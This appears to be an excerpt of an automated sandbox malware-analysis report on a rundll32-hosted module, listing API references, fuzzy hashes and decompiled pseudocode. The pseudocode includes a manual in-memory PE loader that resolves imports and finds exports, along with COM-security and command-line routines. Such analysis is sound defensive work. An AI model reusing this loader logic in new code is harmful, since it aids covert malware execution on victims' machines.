            0x0346fa0d
            0x0346fa0f
            0x00000000
            0x00000000
            0x0346fa13
            0x00000000
            0x0346fa13
            0x0346f889
            0x00000000

            APIs
            • memset.MSVCRT ref: 0346F7D4
            • memset.MSVCRT ref: 0346F7E5
              • Part of subcall function 03468F63: memset.MSVCRT ref: 03468F75
            • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 0346F8BA
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: memset$ErrorLast
            • String ID: POST
            • API String ID: 2570506013-1814004025
            • Opcode ID: 1be270d4c8620b07ac5a59ba16f0081fb9168203f77e8c118903e41858250abf
            • Instruction ID: 824dacaabcaa70442fcb465af4986cd100999377ac1c21d8cf83b4ae045e1b61
            • Opcode Fuzzy Hash: 1be270d4c8620b07ac5a59ba16f0081fb9168203f77e8c118903e41858250abf
            • Instruction Fuzzy Hash: F1A17175A00319AFDB10EFA5D888AAEB7F8FF08310F15406AE415EF250DB749A49CF95
            Uniqueness

            Uniqueness Score: -1.00%

            Function 034714C5 Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: _snprintfqsort
            • String ID: %I64d$false$null$true
            • API String ID: 756996078-4285102228
            • Opcode ID: 5bdd2b752d0f0d10c129e41f4f7a5ccfc25f21ac1d565ea3698d8632a8185a02
            • Instruction ID: a9efb062724684d14c025236e95c757a6ef86cd8ec50a17d415b8febc117d378
            • Opcode Fuzzy Hash: 5bdd2b752d0f0d10c129e41f4f7a5ccfc25f21ac1d565ea3698d8632a8185a02
            • Instruction Fuzzy Hash: 23E17CB190020ABFDF15EE65CC81EEF3B69EF05784F14445AFD169E240E731DA618BA8
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0346503F Relevance: 9.2, APIs: 6, Instructions: 247stringCOMMON
            Download Yara Rule
            C-Code - Quality: 83%
            			E0346503F(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, WCHAR* _a12) {
				void _v532;
				char _v548;
				char _v580;
				char _v584;
				short _v588;
				WCHAR* _v592;
				WCHAR* _v596;
				intOrPtr _v600;
				char _v628;
				char _v632;
				void* __ebx;
				void* __esi;
				short _t47;
				WCHAR* _t54;
				WCHAR* _t55;
				intOrPtr _t56;
				signed int _t61;
				void* _t65;
				void* _t66;
				WCHAR* _t67;
				intOrPtr _t68;
				WCHAR* _t70;
				intOrPtr _t71;
				WCHAR* _t73;
				WCHAR* _t83;
				intOrPtr _t84;
				void* _t85;
				intOrPtr _t86;
				void* _t93;
				intOrPtr _t94;
				intOrPtr _t96;
				void* _t99;
				void* _t100;
				WCHAR* _t101;
				void* _t112;
				WCHAR* _t116;
				intOrPtr _t127;
				void* _t128;
				void* _t146;
				WCHAR* _t149;
				void* _t150;
				void* _t152;
				void* _t156;
				WCHAR* _t157;
				WCHAR* _t159;
				signed int _t160;
				signed int _t161;
				intOrPtr* _t163;
				signed int _t165;
				void* _t168;
				void* _t169;
				intOrPtr* _t170;
				void* _t175;

				_t175 = __fp0;
				_push(_t160);
				_t99 = __edx;
				_t156 = __ecx;
				_t161 = _t160 | 0xffffffff;
				memset( &_v532, 0, 0x20c);
				_t168 = (_t165 & 0xfffffff8) - 0x254 + 0xc;
				_v592 = 1;
				if(_t156 != 0) {
					_t94 =  *0x347f8d4; // 0x50ffc00
					_t3 = _t94 + 0x110; // 0x51016d0
					_t96 =  *0x347f8d8; // 0x50ffab0
					_v600 =  *((intOrPtr*)(_t96 + 0x68))(_t156,  *((intOrPtr*)( *_t3)));
				}
				if(E0346CB85(_t156) != 0) {
					L4:
					_t47 = E0346C85A();
					_push(_t99);
					_v588 = _t47;
					E0346C64D(_t47,  &_v580, _t173, _t175);
					_t100 = E03464FFB( &_v580,  &_v580, _t173);
					_t112 = E0346E34A( &_v580, E0346A5D0( &_v580), 0);
					E0346C870(_t112,  &_v548, _t175);
					_push(_t112);
					_t54 = E03463174(_t156,  &_v580, _t173, _t175);
					_v596 = _t54;
					if(_t54 != 0) {
						_push(0);
						_push(_t100);
						_push(0x347c9d8);
						_t55 = E03469C50(_t54);
						_t169 = _t168 + 0x10;
						_t101 = _t55;
						__eflags = _v592;
						if(__eflags != 0) {
							_t56 = E03469AB3(_v596);
							_t116 = _t101;
							 *0x347f990 = _t56;
							 *0x347f988 = E03469AB3(_t116);
							L12:
							_push(_t116);
							_t157 = E0346A7C6( &_v532, _t156, _t175, _v588,  &_v584,  &_v596);
							_t170 = _t169 + 0x10;
							__eflags = _t157;
							if(_t157 == 0) {
								goto L36;
							}
							_push(0x347ca26);
							_t146 = 0xe;
							E0346AC36(_t146, _t175);
							E0346AC6F(_t157, _t175, _t101);
							_t163 = _a4;
							_push( *_t163);
							E0346AC11(0xb);
							_t148 =  *(_t163 + 0x10);
							__eflags =  *(_t163 + 0x10);
							if( *(_t163 + 0x10) != 0) {
								E0346B1B1(_t148, _t175);
							}
							_t149 =  *(_t163 + 0xc);
							__eflags = _t149;
							if(_t149 != 0) {
								E0346B1B1(_t149, _t175);
							}
							_t65 = E0346A1F8(0);
							_push(_t149);
							_t150 = 2;
							_t66 = E0346ABE3();
							__eflags = _v592;
							_t127 = _t65;
							if(_v592 == 0) {
								_t127 =  *0x347f8d4; // 0x50ffc00
								__eflags =  *((intOrPtr*)(_t127 + 0xa4)) - 1;
								if(__eflags != 0) {
									_t67 = E03470DDF(_t66, _t101, _t150, _t175, 0, _t101, 0);
									_t170 = _t170 + 0xc;
									goto L21;
								}
								_t127 = _t127 + 0x228;
								goto L20;
							} else {
								_t68 =  *0x347f8d4; // 0x50ffc00
								__eflags =  *((intOrPtr*)(_t68 + 0xa4)) - 1;
								if(__eflags != 0) {
									L27:
									__eflags =  *(_t68 + 0x1898) & 0x00000082;
									if(( *(_t68 + 0x1898) & 0x00000082) != 0) {
										_t152 = 0x64;
										E0346F15B(_t152);
									}
									E0346565D( &_v580, _t175);
									_t159 = _a8;
									_t128 = _t127;
									__eflags = _t159;
									if(_t159 != 0) {
										_t71 =  *0x347f8d4; // 0x50ffc00
										__eflags =  *((intOrPtr*)(_t71 + 0xa0)) - 1;
										if( *((intOrPtr*)(_t71 + 0xa0)) != 1) {
											lstrcpyW(_t159, _t101);
										} else {
											_t73 = E0346109A(_t128, 0x153);
											_v596 = _t73;
											lstrcpyW(_t159, _t73);
											E03468D9A( &_v596);
											 *_t170 = "\"";
											lstrcatW(_t159, ??);
											lstrcatW(_t159, _t101);
											lstrcatW(_t159, "\"");
										}
									}
									_t70 = _a12;
									__eflags = _t70;
									if(_t70 != 0) {
										 *_t70 = _v588;
									}
									_t161 = 0;
									__eflags = 0;
									goto L36;
								}
								_t32 = _t68 + 0x228; // 0x50ffe28
								_t127 = _t32;
								L20:
								_t67 = E034658D2(_t127, _t101, __eflags);
								L21:
								__eflags = _t67;
								if(_t67 >= 0) {
									_t68 =  *0x347f8d4; // 0x50ffc00
									goto L27;
								}
								_push(0xfffffffd);
								L6:
								_pop(_t161);
								goto L36;
							}
						}
						_t83 = E0346D210(_v588, __eflags);
						_v596 = _t83;
						_t84 =  *0x347f8d0; // 0x50ff8c0
						_t85 =  *((intOrPtr*)(_t84 + 0xdc))(_t83, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
						__eflags = _t85 - _t161;
						if(_t85 != _t161) {
							_t86 =  *0x347f8d0; // 0x50ff8c0
							 *((intOrPtr*)(_t86 + 0x30))();
							E03468DDF( &_v632, _t161);
							_t116 = _t85;
							goto L12;
						}
						E03468DDF( &_v628, _t161);
						_t61 = 1;
						goto L37;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t93 = E0346308A( &_v532, _t161, 0x105);
					_t173 = _t93;
					if(_t93 == 0) {
						L36:
						_t61 = _t161;
						L37:
						return _t61;
					}
					goto L4;
				}
			}
























































            0x0346503f
            0x0346504c
            0x03465057
            0x0346505c
            0x0346505e
            0x03465061
            0x03465066
            0x03465069
            0x03465073
            0x03465075
            0x0346507a
            0x03465082
            0x0346508b
            0x0346508b
            0x03465098
            0x034650b3
            0x034650b5
            0x034650ba
            0x034650bf
            0x034650c5
            0x034650d4
            0x034650f3
            0x034650f5
            0x034650fa
            0x03465101
            0x03465106
            0x0346510d
            0x03465117
            0x03465119
            0x0346511a
            0x03465120
            0x03465125
            0x03465128
            0x0346512a
            0x0346512f
            0x03465196
            0x0346519b
            0x0346519d
            0x034651a7
            0x034651ac
            0x034651ac
            0x034651c6
            0x034651c8
            0x034651cb
            0x034651cd
            0x00000000
            0x00000000
            0x034651d3
            0x034651da
            0x034651dd
            0x034651e6
            0x034651eb
            0x034651f1
            0x034651f6
            0x034651fb
            0x034651ff
            0x03465201
            0x03465205
            0x03465205
            0x0346520a
            0x0346520d
            0x0346520f
            0x03465213
            0x03465213
            0x0346521a
            0x0346521f
            0x03465223
            0x03465226
            0x0346522b
            0x03465231
            0x03465232
            0x0346525a
            0x03465260
            0x03465267
            0x03465276
            0x0346527b
            0x00000000
            0x0346527b
            0x03465269
            0x00000000
            0x03465234
            0x03465234
            0x03465239
            0x03465240
            0x03465285
            0x03465285
            0x0346528c
            0x03465290
            0x03465291
            0x03465291
            0x0346529b
            0x034652a0
            0x034652a3
            0x034652a4
            0x034652a6
            0x034652a8
            0x034652ad
            0x034652b4
            0x034652f7
            0x034652b6
            0x034652bb
            0x034652c3
            0x034652c7
            0x034652d2
            0x034652dd
            0x034652e5
            0x034652e9
            0x034652f1
            0x034652f1
            0x034652b4
            0x034652fd
            0x03465300
            0x03465302
            0x03465308
            0x03465308
            0x0346530a
            0x0346530a
            0x00000000
            0x0346530a
            0x03465242
            0x03465242
            0x03465248
            0x0346524a
            0x0346524f
            0x0346524f
            0x03465251
            0x03465280
            0x00000000
            0x03465280
            0x03465253
            0x03465111
            0x03465111
            0x00000000
            0x03465111
            0x03465232
            0x03465135
            0x03465143
            0x03465156
            0x0346515b
            0x03465161
            0x03465163
            0x0346517b
            0x03465180
            0x03465189
            0x0346518f
            0x00000000
            0x0346518f
            0x0346516b
            0x03465174
            0x00000000
            0x03465174
            0x0346510f
            0x00000000
            0x0346509a
            0x034650a5
            0x034650ab
            0x034650ad
            0x0346530c
            0x0346530c
            0x0346530e
            0x03465314
            0x03465314
            0x00000000
            0x034650ad

            APIs
            • memset.MSVCRT ref: 03465061
            • lstrcpyW.KERNEL32 ref: 034652C7
            • lstrcatW.KERNEL32(00000000,?), ref: 034652E5
            • lstrcatW.KERNEL32(00000000,00000000), ref: 034652E9
            • lstrcatW.KERNEL32(00000000,0347CA28), ref: 034652F1
              • Part of subcall function 03468DDF: HeapFree.KERNEL32(00000000,00000000), ref: 03468E25
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: lstrcat$FreeHeaplstrcpymemset
            • String ID:
            • API String ID: 911671052-0
            • Opcode ID: a537a0d6a702bfd09184bb82c09847487e0813bffe8e16bdd93ef245a75c90b4
            • Instruction ID: 18c7f67a9268ed46fccec91ea3f56cbf79d0b5408989dd74f3310475ee60bbba
            • Opcode Fuzzy Hash: a537a0d6a702bfd09184bb82c09847487e0813bffe8e16bdd93ef245a75c90b4
            • Instruction Fuzzy Hash: 1671DF75604301AFD714EF25D884BBB73E9EBC5610F18056FE456AF280EB7098488B9B
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0346DEAB Relevance: 9.1, APIs: 6, Instructions: 98stringCOMMON
            Download Yara Rule
            C-Code - Quality: 93%
            			E0346DEAB(WCHAR* __ecx) {
				int _v8;
				WCHAR* _v12;
				WCHAR* _v16;
				WCHAR* _v140;
				WCHAR* _v144;
				short _v664;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				WCHAR* _t36;
				int _t40;
				signed int _t41;
				int _t44;
				signed int _t45;
				WCHAR* _t49;
				signed int _t51;
				WCHAR* _t52;
				void* _t53;

				_v8 = _v8 & 0x00000000;
				_v16 = __ecx;
				_t51 = 0;
				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
				_t44 = _v8;
				_t41 = 0;
				_v12 = _t28;
				if(_t44 <= 0) {
					L22:
					_t29 = _t28 | 0xffffffff;
					__eflags = _t29;
					return _t29;
				} else {
					goto L1;
				}
				do {
					L1:
					_t49 =  *(_t28 + _t41 * 4);
					_t30 =  *_t49 & 0x0000ffff;
					if(_t30 != 0 && _t30 != 0xd && _t30 != 0xa && _t30 != 0x2d && _t30 != 0x2f && _t51 < 0x20) {
						 *(_t53 + _t51 * 4 - 0x8c) = _t49;
						_t40 = lstrlenW(_t49);
						_t45 = 0;
						if(_t40 <= 0) {
							L11:
							_t44 = _v8;
							_t51 = _t51 + 1;
							goto L12;
						} else {
							goto L8;
						}
						do {
							L8:
							if(_t49[_t45] == 0x2c) {
								_t49[_t45] = 0;
							}
							_t45 = _t45 + 1;
						} while (_t45 < _t40);
						goto L11;
					}
					L12:
					_t28 = _v12;
					_t41 = _t41 + 1;
				} while (_t41 < _t44);
				if(_t51 != 1) {
					if(__eflags <= 0) {
						goto L22;
					}
					_t52 = _v140;
					L17:
					if( *_t52 == 0x5c || _t52[1] == 0x3a) {
						lstrcpynW(_v16, _t52, 0x104);
					} else {
						GetCurrentDirectoryW(0x104,  &_v664);
						_push(0);
						_push(_t52);
						_push(0x347c9d8);
						_t36 = E03469C50( &_v664);
						_v12 = _t36;
						lstrcpynW(_v16, _t36, 0x104);
						E03468DDF( &_v12, 0xfffffffe);
					}
					return 0;
				}
				_t52 = _v144;
				goto L17;
			}





















            0x0346deb4
            0x0346debb
            0x0346debe
            0x0346decb
            0x0346ded1
            0x0346ded4
            0x0346ded6
            0x0346dedb
            0x0346dfb3
            0x0346dfb3
            0x0346dfb3
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0346dee1
            0x0346dee1
            0x0346dee1
            0x0346dee4
            0x0346deea
            0x0346df06
            0x0346df0d
            0x0346df13
            0x0346df17
            0x0346df2b
            0x0346df2b
            0x0346df2e
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0346df19
            0x0346df19
            0x0346df1e
            0x0346df22
            0x0346df22
            0x0346df26
            0x0346df27
            0x00000000
            0x0346df19
            0x0346df2f
            0x0346df2f
            0x0346df32
            0x0346df33
            0x0346df3a
            0x0346df44
            0x00000000
            0x00000000
            0x0346df46
            0x0346df4c
            0x0346df50
            0x0346dfa9
            0x0346df59
            0x0346df66
            0x0346df6c
            0x0346df6e
            0x0346df75
            0x0346df7b
            0x0346df83
            0x0346df8b
            0x0346df97
            0x0346df9d
            0x00000000
            0x0346dfaf
            0x0346df3c
            0x00000000

            APIs
            • GetCommandLineW.KERNEL32 ref: 0346DEC0
            • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 0346DECB
            • lstrlenW.KERNEL32 ref: 0346DF0D
            • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0346DF66
            • lstrcpynW.KERNEL32(?,00000000,00000104), ref: 0346DF8B
            • lstrcpynW.KERNEL32(?,?,00000104), ref: 0346DFA9
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: CommandLinelstrcpyn$ArgvCurrentDirectorylstrlen
            • String ID:
            • API String ID: 1259063344-0
            • Opcode ID: 66d28fd56df91314349d47ac33c766b92f88ab131f34abf365a0724a1775ff34
            • Instruction ID: 98211862f8833ed314bbd54574e737c7bef4f4c5183d98789da976b032970c2d
            • Opcode Fuzzy Hash: 66d28fd56df91314349d47ac33c766b92f88ab131f34abf365a0724a1775ff34
            • Instruction Fuzzy Hash: 3431C471E10115AFDF28EF99D898AAEB7BCEF46310F14409BE411EF250DB7099818B96
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0346E6D9 Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON
            Download Yara Rule
            APIs
            • SysAllocString.OLEAUT32(00000000), ref: 0346E6ED
            • SysAllocString.OLEAUT32(?), ref: 0346E6F5
            • SysAllocString.OLEAUT32(00000000), ref: 0346E709
            • SysFreeString.OLEAUT32(?), ref: 0346E784
            • SysFreeString.OLEAUT32(?), ref: 0346E787
            • SysFreeString.OLEAUT32(?), ref: 0346E78C
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: String$AllocFree
            • String ID:
            • API String ID: 344208780-0
            • Opcode ID: ef5a5bbe08da708db0e8e26c3895cb173462214e6def6b7eb5316e6025bb97a2
            • Instruction ID: 9a45d5a96507cf087186ddf643f0caff1f4a0eb951ee11c3e4398c577cb6e68b
            • Opcode Fuzzy Hash: ef5a5bbe08da708db0e8e26c3895cb173462214e6def6b7eb5316e6025bb97a2
            • Instruction Fuzzy Hash: AE211975A00218BFDB00DFA5CD88DAFBBBDEF88254B20449AE505EB250D770AE01CB60
            Uniqueness

            Uniqueness Score: -1.00%

            Function 03473DC7 Relevance: 7.8, APIs: 5, Instructions: 322libraryloaderstringCOMMON
            Download Yara Rule
            C-Code - Quality: 20%
            			E03473DC7(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16, intOrPtr _a20) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				signed int* _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr* _v48;
				signed short* _v52;
				intOrPtr _v56;
				unsigned int _v60;
				intOrPtr _v64;
				_Unknown_base(*)()* _v68;
				signed int _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				unsigned int _v88;
				intOrPtr _v92;
				signed int _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				CHAR* _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _t216;
				signed int _t233;
				void* _t273;
				signed int _t278;
				signed int _t280;
				intOrPtr _t320;

				_v44 = _v44 & 0x00000000;
				_v84 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v20 = _v84;
				_t320 = _a4 -  *((intOrPtr*)(_v20 + 0x34));
				_v64 = _t320;
				if(_t320 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v20 + 0xbadc25)) == 0) {
						L35:
						if(_a16 == 0) {
							L54:
							_v80 =  *((intOrPtr*)(_v20 + 0x28)) + _a4;
							while(0 != 0) {
							}
							if(_a12 != 0) {
								 *_a12 = _v80;
							}
							 *((intOrPtr*)(_v20 + 0x34)) = _a4;
							_v124 = _v80(_a4, 1, _a8);
							while(0 != 0) {
							}
							if(_v124 != 0) {
								if(_v44 == 0) {
									L77:
									return 1;
								}
								if(_a20 != 1) {
									if(_a20 != 2) {
										L75:
										while(0 != 0) {
										}
										goto L77;
									}
									while(0 != 0) {
									}
									_v132 = _v44;
									goto L75;
								}
								while(0 != 0) {
								}
								_v44();
								goto L75;
							}
							while(0 != 0) {
							}
							return 0;
						}
						while(0 != 0) {
						}
						_push(8);
						if( *((intOrPtr*)(_v20 + 0x78)) == 0) {
							goto L54;
						}
						_v128 = 0x80000000;
						_t216 = 8;
						_v76 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t216 * 0));
						_v108 = _a4 +  *((intOrPtr*)(_v76 + 0x20));
						_v112 = _a4 +  *((intOrPtr*)(_v76 + 0x1c));
						_v104 =  *((intOrPtr*)(_v76 + 0x18));
						while(0 != 0) {
						}
						_v40 = _v40 & 0x00000000;
						while(_v40 < _v104) {
							_v116 = _a4 +  *((intOrPtr*)(_v108 + _v40 * 4));
							_v120 = _a4 +  *((intOrPtr*)(_v112 + _v40 * 4));
							if(lstrcmpA(_v116, _a16) != 0) {
								_v40 = _v40 + 1;
								continue;
							}
							while(0 != 0) {
							}
							_v44 = _v120;
							break;
						}
						if(_v44 != 0) {
							goto L54;
						}
						while(0 != 0) {
						}
						return 0xffffffff;
					}
					_v96 = 0x80000000;
					_t233 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v20 + (_t233 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v24 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v24 =  *_v16 + _a4;
							}
							_v72 = _v72 & 0x00000000;
							while( *_v24 != 0) {
								if(( *_v24 & _v96) == 0) {
									_v100 =  *_v24 + _a4;
									_v68 = GetProcAddress(_v36, _v100 + 2);
								} else {
									_v68 = GetProcAddress(_v36,  *_v24 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v24 = _v68;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v72) = _v68;
								}
								_v24 =  &(_v24[1]);
								_v72 = _v72 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t273 = 0xfffffffd;
							return _t273;
						}
					}
					goto L35;
				}
				_t278 = 8;
				_v52 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t278 * 5));
				_t280 = 8;
				_v56 =  *((intOrPtr*)(_v20 + 0x7c + _t280 * 5));
				while(0 != 0) {
				}
				while(_v56 > 0) {
					_v28 = _v52[2];
					_v56 = _v56 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v52[4]);
					_v92 = _a4 +  *_v52;
					_v60 = _v28;
					while(1) {
						_v88 = _v60;
						_v60 = _v60 - 1;
						if(_v88 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v48 = (_v12 & 0x0000ffff) + _v92;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v48 =  *_v48 + _v64;
							}
						} else {
							 *_v48 =  *_v48 + _v64;
						}
						_v32 =  &(_v32[1]);
					}
					_v52 = _v32;
				}
				goto L13;
			}









































            0x03473dd0
            0x03473ddd
            0x03473de3
            0x03473dec
            0x03473def
            0x03473df2
            0x00000000
            0x03473ee3
            0x03473ee7
            0x03473ee9
            0x03473ef7
            0x03474015
            0x03474019
            0x034740de
            0x034740e7
            0x034740ea
            0x034740ee
            0x034740f4
            0x034740fc
            0x034740fc
            0x03474104
            0x03474112
            0x03474115
            0x03474119
            0x0347411f
            0x0347412f
            0x0347415a
            0x00000000
            0x0347415c
            0x03474135
            0x03474146
            0x00000000
            0x03474154
            0x03474158
            0x00000000
            0x03474154
            0x03474148
            0x0347414c
            0x03474151
            0x00000000
            0x03474151
            0x03474137
            0x0347413b
            0x0347413d
            0x00000000
            0x0347413d
            0x03474121
            0x03474125
            0x00000000
            0x03474127
            0x0347401f
            0x03474023
            0x03474025
            0x03474033
            0x00000000
            0x00000000
            0x03474039
            0x03474042
            0x03474050
            0x0347405c
            0x03474068
            0x03474071
            0x03474074
            0x03474078
            0x0347407a
            0x03474087
            0x0347409b
            0x034740aa
            0x034740bb
            0x03474084
            0x00000000
            0x03474084
            0x034740bd
            0x034740c1
            0x034740c6
            0x00000000
            0x034740c6
            0x034740d1
            0x00000000
            0x00000000
            0x034740d3
            0x034740d7
            0x00000000
            0x034740d9
            0x03473efd
            0x03473f06
            0x03473f14
            0x03473f17
            0x03473f34
            0x03473f3b
            0x03473f4d
            0x03473f4d
            0x03473f54
            0x03473f64
            0x03473f7c
            0x03473f66
            0x03473f6e
            0x03473f6e
            0x03473f7f
            0x03473f83
            0x03473f93
            0x03473fb6
            0x03473fc8
            0x03473f95
            0x03473fa9
            0x03473fa9
            0x03473fd2
            0x03473fee
            0x03473fd4
            0x03473fe3
            0x03473fe3
            0x03473ff6
            0x03473fff
            0x03473fff
            0x0347400d
            0x00000000
            0x03473f56
            0x03473f58
            0x00000000
            0x03473f58
            0x03473f54
            0x00000000
            0x03473f17
            0x03473dfa
            0x03473e08
            0x03473e0d
            0x03473e18
            0x03473e1b
            0x03473e1f
            0x03473e21
            0x03473e31
            0x03473e3a
            0x03473e43
            0x03473e4b
            0x03473e54
            0x03473e5f
            0x03473e65
            0x03473e68
            0x03473e6b
            0x03473e72
            0x03473e79
            0x00000000
            0x00000000
            0x03473e84
            0x03473e92
            0x03473e9d
            0x03473ea7
            0x03473ebf
            0x03473ecc
            0x03473ecc
            0x03473ea9
            0x03473eb4
            0x03473eb4
            0x03473ed3
            0x03473ed3
            0x03473edb
            0x03473edb
            0x00000000

            APIs
            • GetModuleHandleA.KERNEL32(00000000), ref: 03473F2E
            • LoadLibraryA.KERNEL32(00000000), ref: 03473F47
            • GetProcAddress.KERNEL32(00000000,?), ref: 03473FA3
            • GetProcAddress.KERNEL32(00000000,?), ref: 03473FC2
            • lstrcmpA.KERNEL32(?,00000000), ref: 034740B3
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: AddressProc$HandleLibraryLoadModulelstrcmp
            • String ID:
            • API String ID: 1872726118-0
            • Opcode ID: bd2e903e1508fac69e961ab0d7b5bc41baf6ae9dd9875eb9dc25cc9b5561e197
            • Instruction ID: ed971c0d092f8db93b33893a71defd94b8ef0605079ffa730b70fa91e479d26c
            • Opcode Fuzzy Hash: bd2e903e1508fac69e961ab0d7b5bc41baf6ae9dd9875eb9dc25cc9b5561e197
            • Instruction Fuzzy Hash: A0E19F74A10249DFCB14CFA9C884AEEBBF1FF08354F14855AE825AB351D734A985CF98
            Uniqueness

            Uniqueness Score: -1.00%

            Function 03471A0A Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID: @$\u%04X$\u%04X\u%04X
            • API String ID: 0-2132903582
            • Opcode ID: 353f941563edf6a18604ee3d1b63578f9296c99f674609c9cda5fcce4f5449f2
            • Instruction ID: 5880baed81fb62504b91675ba7d2897d891fccfca76d1b08029365e3e627dd7a
            • Opcode Fuzzy Hash: 353f941563edf6a18604ee3d1b63578f9296c99f674609c9cda5fcce4f5449f2
            • Instruction Fuzzy Hash: 1F41A371A0020AABDB25CDA88D9EAFF7769DF41624F180157FD12DE740E361CAA182DD
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0346E485 Relevance: 7.6, APIs: 5, Instructions: 87commemoryCOMMON
            Download Yara Rule
            C-Code - Quality: 30%
            			E0346E485(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x347c8a0, 0, 1, 0x347c8b0, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E03468DC9(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}













            0x0346e492
            0x0346e495
            0x0346e498
            0x0346e4a9
            0x0346e4af
            0x0346e4c0
            0x0346e4c8
            0x0346e519
            0x0346e519
            0x0346e51e
            0x0346e523
            0x0346e523
            0x0346e526
            0x0346e52b
            0x0346e530
            0x0346e530
            0x0346e533
